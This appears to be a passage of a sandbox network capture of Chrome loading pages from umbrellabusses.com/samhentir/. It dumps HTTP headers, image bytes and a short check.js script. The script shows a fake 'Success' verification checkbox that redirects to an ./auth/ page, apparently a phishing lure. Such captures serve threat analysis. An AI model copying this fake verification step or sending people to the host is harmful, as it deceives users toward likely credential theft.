                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC1171INData Raw: b0 19 b1 ba df 06 14 a1 8f 72 05 ed 15 e1 5a 18 b7 2f 73 b0 19 b1 42 f5 05 ae 9c 87 41 a8 4f 05 f9 a7 22 90 5b 62 40 ee b9 02 f2 d0 67 20 3d 58 e2 f6 6f 8c cd 88 c5 fd 28 4f ce c3 a0 9b f8 1e e4 3b e7 40 ae 7f 66 9b d6 17 40 9a eb e3 8e 41 8b 6d 88 5d bb bf ef 62 85 ca 97 41 d2 09 86 52 35 48 b3 df f1 c7 f2 37 56 2d 56 77 ef 36 08 9f 3e cb 15 f3 30 e0 03 50 5a d7 4f 79 b9 fb 32 57 ac dc f2 3c 48 5b 3b bf 48 58 ad 58 b1 f5 6d ae 14 15 65 37 80 1b 7d 7c 5d 15 6a 12 40 a8 7d 1d 84 ba 64 65 dd 7c 03 c4 c6 2b ca 6b ed 5b 20 b6 bd 03 62 47 0e 3d fd c5 ce 42 65 6b 76 0d 74 bf f6 1a f6 b5 b9 0a d2 f8 6d 90 7f 2e 01 f9 c7 5c 90 3b 93 54 b9 d2 f8 57 86 e7 6a b0 4a b1 b8 ad e2 ca d4 c2 c4 56 bd aa 88 7d 0d 84 2f 15 b1 b7 2f d3 03 49 6c ba 4a df 0b c4 b6 2c 10 ef e4
                                                                                                                                                                                                                        Data Ascii: rZ/sBAO"[b@g =Xo(O;@f@Am]bAR5H7V-Vw6>0PZOy2W<H[;HXXme7}|]j@}de|+k[ bG=Bekvtm.\;TWjJV}//IlJ,
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        62192.168.2.549882104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC565OUTGET /samhentir/js/check.js?v=1736517172 HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC985INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:53 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Content-Length: 544
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:36:12 GMT
                                                                                                                                                                                                                        ETag: "675ef76c-220"
                                                                                                                                                                                                                        Expires: Sat, 11 Jan 2025 01:52:53 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: MISS
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIpxLblfdz%2B8ROV2rF8yYTN%2BTJQV9voWhGjraPSYmJ3DoWJTnDw1ISoEObWqoXVg3npZTV6Lr3eyKZn0fM41oUnz5Ruw%2BvyDPLEFSHbC4tYbSH88ldPV2Bxy0M7lcQIgt0xwgsg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd266c69f48cc8-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1828&min_rtt=1819&rtt_var=701&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1143&delivery_rate=1540897&cwnd=237&unsent_bytes=0&cid=2d7ed7a75b5b7356&ts=313&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC384INData Raw: 63 6f 6e 73 74 20 72 62 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 72 62 22 29 3b 0d 0a 63 6f 6e 73 74 20 72 62 6c 61 62 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 72 62 6c 61 62 22 29 3b 0d 0a 63 6f 6e 73 74 20 72 62 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 72 62 6f 22 29 3b 0d 0a 0d 0a 72 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 72 62 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 72 62 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 72 62 6c 61 62 2e 74 65 78 74 43
                                                                                                                                                                                                                        Data Ascii: const rb = document.querySelector(".rb");const rblab = document.querySelector(".rblab");const rbo = document.querySelector(".rbo");rb.addEventListener("change", () => { rb.classList.add("close"); rbo.classList.remove("close"); rblab.textC
                                                                                                                                                                                                                        2025-01-10 13:52:53 UTC160INData Raw: 65 66 20 3d 20 22 2e 2f 61 75 74 68 2f 22 0d 0a 20 20 20 20 72 62 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 20 20 72 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 20 20 72 62 6c 61 62 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 20 22 53 75 63 63 65 73 73 22 3b 0d 0a 20 20 20 20 72 62 2e 63 68 65 63 6b 65 64 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 7d 2c 20 35 30 30 29 3b 0d 0a 7d 29 3b
                                                                                                                                                                                                                        Data Ascii: ef = "./auth/" rbo.classList.add("close"); rb.classList.remove("close"); rblab.textContent = "Success"; rb.checked = false; }, 500);});


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        63192.168.2.549892104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC369OUTGET /samhentir/img/flaretext.png HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC992INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:54 GMT
                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:25:20 GMT
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        ETag: W/"675ef4e0-601"
                                                                                                                                                                                                                        Expires: Sat, 08 Feb 2025 08:24:08 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 106126
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KLymnfYc5cx1TUPcVnGMk%2BMqRUrUxUHUrpZf4jjE9w%2FfsamAx59lNVRezhxRaVQt9KtxC8g0TvODubvMkQYTj3Nx2ZpWW1q1d3CLcOg3dAfUd2d2QmeaD0R7TzbLpplWfUprYJs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd2673ebfec333-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1469&rtt_var=734&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4232&recv_bytes=947&delivery_rate=176392&cwnd=143&unsent_bytes=0&cid=97aaccf3268a43dc&ts=210&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC377INData Raw: 36 30 31 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 56 00 00 00 23 08 06 00 00 00 0e b9 fd 85 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 05 96 49 44 41 54 68 43 ed 99 6b 4c 1c 55 14 80 a1 84 42 e0 1f 84 14 92 16 a2 26 8d 21 8d a9 05 34 e5 19 89 90 26 22 9a fe 90 36 2a 45 88 4d 69 90 d0 22 12 25 40 22 04 51 51 a4 01 a3 d0 26 b6 3c 82 54 de 8f 46 41 94 82 98 10 b1 01 12 08 28 20 20 42 0a 42 80 c2 cc ce fc 38 ce 39 eb 1d 66 d7 cb b2 52 36 ba cb fe f8 02 67 ce cc bd 77 3e ce bd 73 67 70 90 24 09 ec ec 3f 76 b1 16 c2 2e d6 42 d8 c5 5a 08 bb 58 0b 71 e0 c4 ea e6 47 40 6c c9 84 ad f7 1e 87 ad 77 fd 60 ab f8 29 10 2a 5f 01 b1 eb 7d
                                                                                                                                                                                                                        Data Ascii: 601PNGIHDRV#sRGBgAMAapHYsodIDAThCkLUB&!4&"6*EMi"%@"QQ&<TFA( BB89fR6gw>sgp$?v.BZXqG@lw`)*_}
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1167INData Raw: df 06 14 a1 8f 72 05 ed 15 e1 5a 18 b7 2f 73 b0 19 b1 42 f5 05 ae 9c 87 41 a8 4f 05 f9 a7 22 90 5b 62 40 ee b9 02 f2 d0 67 20 3d 58 e2 f6 6f 8c cd 88 c5 fd 28 4f ce c3 a0 9b f8 1e e4 3b e7 40 ae 7f 66 9b d6 17 40 9a eb e3 8e 41 8b 6d 88 5d bb bf ef 62 85 ca 97 41 d2 09 86 52 35 48 b3 df f1 c7 f2 37 56 2d 56 77 ef 36 08 9f 3e cb 15 f3 30 e0 03 50 5a d7 4f 79 b9 fb 32 57 ac dc f2 3c 48 5b 3b bf 48 58 ad 58 b1 f5 6d ae 14 15 65 37 80 1b 7d 7c 5d 15 6a 12 40 a8 7d 1d 84 ba 64 65 dd 7c 03 c4 c6 2b ca 6b ed 5b 20 b6 bd 03 62 47 0e 3d fd c5 ce 42 65 6b 76 0d 74 bf f6 1a f6 b5 b9 0a d2 f8 6d 90 7f 2e 01 f9 c7 5c 90 3b 93 54 b9 d2 f8 57 86 e7 6a b0 4a b1 b8 ad e2 ca d4 c2 c4 56 bd aa 88 7d 0d 84 2f 15 b1 b7 2f d3 03 49 6c ba 4a df 0b c4 b6 2c 10 ef e4 6e 8b fd e1
                                                                                                                                                                                                                        Data Ascii: rZ/sBAO"[b@g =Xo(O;@f@Am]bAR5H7V-Vw6>0PZOy2W<H[;HXXme7}|]j@}de|+k[ bG=Bekvtm.\;TWjJV}//IlJ,n
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        64192.168.2.549896104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC376OUTGET /samhentir/js/check.js?v=1736517172 HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC995INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:54 GMT
                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                        Content-Length: 544
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:36:12 GMT
                                                                                                                                                                                                                        ETag: "675ef76c-220"
                                                                                                                                                                                                                        Expires: Sat, 11 Jan 2025 01:52:53 GMT
                                                                                                                                                                                                                        Cache-Control: max-age=43200
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                        Age: 1
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbGSOFwmp0n%2BlY6GthYcI5PxpViOVZe0DtLIFTBKrlE37bs%2BjPc3UFaxKbInPY2NA%2BND7K7c1swPiBKwWzuIvNQnJtEFIDVXkRzRfyYcD5kLklt%2FShtGN1xopvczZiLUdlyczd8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd2674ab9942d1-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=19616&min_rtt=18556&rtt_var=7716&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=954&delivery_rate=157361&cwnd=199&unsent_bytes=0&cid=b7f00d5c91c824aa&ts=174&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC374INData Raw: 63 6f 6e 73 74 20 72 62 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 72 62 22 29 3b 0d 0a 63 6f 6e 73 74 20 72 62 6c 61 62 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 72 62 6c 61 62 22 29 3b 0d 0a 63 6f 6e 73 74 20 72 62 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 72 62 6f 22 29 3b 0d 0a 0d 0a 72 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 68 61 6e 67 65 22 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 72 62 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 72 62 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 72 62 6c 61 62 2e 74 65 78 74 43
                                                                                                                                                                                                                        Data Ascii: const rb = document.querySelector(".rb");const rblab = document.querySelector(".rblab");const rbo = document.querySelector(".rbo");rb.addEventListener("change", () => { rb.classList.add("close"); rbo.classList.remove("close"); rblab.textC
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC170INData Raw: 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 2e 2f 61 75 74 68 2f 22 0d 0a 20 20 20 20 72 62 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 20 20 72 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 63 6c 6f 73 65 22 29 3b 0d 0a 20 20 20 20 72 62 6c 61 62 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 20 22 53 75 63 63 65 73 73 22 3b 0d 0a 20 20 20 20 72 62 2e 63 68 65 63 6b 65 64 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 7d 2c 20 35 30 30 29 3b 0d 0a 7d 29 3b
                                                                                                                                                                                                                        Data Ascii: ocation.href = "./auth/" rbo.classList.add("close"); rb.classList.remove("close"); rblab.textContent = "Success"; rb.checked = false; }, 500);});


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        65192.168.2.549895104.21.83.974435852C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC612OUTGET /samhentir/img/ffg.ico HTTP/1.1
                                                                                                                                                                                                                        Host: umbrellabusses.com
                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                        Referer: https://umbrellabusses.com/samhentir/
                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC949INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Date: Fri, 10 Jan 2025 13:52:54 GMT
                                                                                                                                                                                                                        Content-Type: image/x-icon
                                                                                                                                                                                                                        Content-Length: 15406
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 15:25:20 GMT
                                                                                                                                                                                                                        ETag: "675ef4e0-3c2e"
                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                        Cache-Control: max-age=14400
                                                                                                                                                                                                                        CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2j0lDEftISudblZeVDmw4Y02%2BaJYavIqS1wC57PZFHNGz1BTyAaBWg59vVYsMO6DcZpgnqbuxgJf%2BaJAOpgNAHGHJuQXVcePpb2YGQ%2FE2BvB%2FSODuWXiUYEvBjgxMaVQiBLLuw8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                        CF-RAY: 8ffd2674cc4b42ec-EWR
                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=21100&min_rtt=16159&rtt_var=9589&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1190&delivery_rate=180704&cwnd=183&unsent_bytes=0&cid=e6dbfd5e5eb3f76f&ts=329&x=0"
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC420INData Raw: 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e9 90 bc 17 e3 88 b8 6f dd 81 b1 6f de 7a b1 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 92 db 07 f4 95 c9 76 ed 8e c2 f1 e5 88 b9 ff dd 81 b1 ff d6 7b a8 f1 cd 75 a0 76 b6 6d 92 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 98 cf 4f fd 9b d3 db f7 96 cc ff ef 90 c4 ff e6 88 ba ff dc
                                                                                                                                                                                                                        Data Ascii: h6 (00 h&( oozv{uvmO
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: 48 d5 d9 7a 45 ff d7 79 3c ff d1 75 2e ff c7 6f 21 ff b7 66 15 e7 a0 57 10 61 d8 7c a8 61 c6 6e 97 e7 b8 63 89 ff ae 5c 80 ff a9 58 79 ff a5 55 76 ff a2 54 71 d5 00 00 00 00 00 00 00 00 db 7a 53 d9 da 7b 54 ff da 7b 54 ff da 7b 51 ff d7 79 47 ea d1 76 2e 1c 00 00 00 00 00 00 00 00 b6 64 89 1c aa 59 7b eb a4 54 75 ff 9f 50 6f ff 96 4b 68 ff af 74 5c d8 00 00 00 00 00 00 00 00 dc 7b 60 d9 dc 7c 62 ff dc 7c 65 ff dc 7c 69 ff dd 7c 6e 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 99 4d 6b 8f 95 49 66 ff 8b 43 5d ff a4 6c 53 ff f4 d7 50 d8 00 00 00 00 00 00 00 00 dc 7b 6c d9 dd 7c 70 ff dd 7c 75 ff de 7d 7d ff e0 7d 86 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 43 5e 7a 92 53 54 ff d3 aa 4f ff fc e0 4f ff fe e1 4f d8 00 00 00 00 00 00 00 00 dd
                                                                                                                                                                                                                        Data Ascii: HzEy<u.o!fWa|anc\XyUvTqzS{T{T{QyGv.dY{TuPoKht\{`|b|e|i|nMkIfC]lSP{l|p|u}}}zC^zSTOOO
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: ff e8 8a bc ff e3 87 b8 ff df 83 b3 ff da 80 ae ff d6 7c a9 ff d1 78 a4 ff cd 75 a0 ff c9 72 9c ff c6 6f 99 f2 c3 6c 95 7b c6 71 8e 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 01 f9 98 cb 54 fa 99 cf de fd 9b d3 ff fe 9c d3 ff fa 99 d0 ff f6 96 cb ff f2 92 c7 ff ed 8e c2 ff e9 8a bd ff e3 87 b8 ff de 83 b2 ff da 7f ad ff d5 7b a8 ff d0 77 a3 ff cc 73 9f ff c7 70 9a ff c4 6d 96 ff c0 6b 92 ff be 67 90 de b9 67 8c 54 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 68 17 2c c1 6d 2c be b4 64 22 ff a6 5b 15 ff a8 5d 2c ff c6 73 6e ff f4 95 c4 ff f8 97 ce ff f4 94 c9 ff ef 90
                                                                                                                                                                                                                        Data Ascii: |xurol{qT{wspmkggTh,m,d"[],sn
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: dc 7c 65 ff dc 7c 67 ff dc 7c 68 ff dc 7c 6a ff dc 7c 6d ff dd 7c 70 ff dd 7d 75 f9 ff 92 6d 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 40 60 08 96 49 66 f9 92 47 64 ff 8e 45 60 ff 88 41 5b ff 81 3d 55 ff 9c 64 4f ff e7 c7 4f ff fe e4 50 ff ff e5 50 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 7c 69 b3 dc 7c 6a ff dc 7c 6c ff dd 7c 6e ff dd 7c 70 ff dd 7c 73 ff dd 7c 76 ff de 7d 7b ff de 7d 81 f3 ff 80 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 80 02 90 46 62 f3 8a 42 5c ff 82 3e 56 ff 8c 4e 4f ff d1 a9 4e ff fd e1 4f ff fd e3 4f ff fe e3 4f ff ff e4 50 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 7c 6f b3 dd 7c 70
                                                                                                                                                                                                                        Data Ascii: |e|g|h|j|m|p}um@`IfGdE`A[=UdOOPP|i|j|l|n|p|s|v}{}FbB\>VNONOOOP|o|p
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: bb 4b be ee bf 4b 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 ff 01 e1 7e a2 55 e0 7e a7 de e1 7f ab ff e2 7f ac ff df 7d a7 ff 91 4a 35 ff a7 59 38 ff bc 69 3d ff cb 77 42 ff d5 84 45 ff da 8c 46 ff dc 92 47 ff de 97 47 ff e0 9c 48 ff e3 a1 48 ff e4 a6 49 ff e6 aa 49 ff e8 ae 4a ff e9 b2 4a de ea b3 49 54 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 8e aa 09 e0 80 ad 7c e1 7e ac f2 e1 7e a9 ff a4 56 4d ff a8 59 38 ff bc 69 3e ff cc 77 42 ff d6 84 45 ff da 8c 46 ff dc 91 47 ff de 96 47 ff e0 9b 47 ff e2 9f 48 ff e3 a4 49 ff e6 a9 49 f2 e8 ac 49 7b ff aa 55 09 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: KK,~U~}J5Y8i=wBEFGGHHIIJJIT|~~VMY8i>wBEFGGGHIII{U
                                                                                                                                                                                                                        2025-01-10 13:52:54 UTC1369INData Raw: b8 65 e2 85 b6 7b e0 85 b4 7b de 81 b1 65 db 80 b2 38 df 80 9f 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 01 eb 8e bf 34 ea 8c bf b3 e7 8a bc e7 e4 88 b9 f6 e2 85 b6 fd e0 84 b4 fc dd 82 b1 f6 db 80 ae e7 d9 7d ac b5 d8 7b ac 34 ff ff ff 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                        Data Ascii: e{{e84}{4
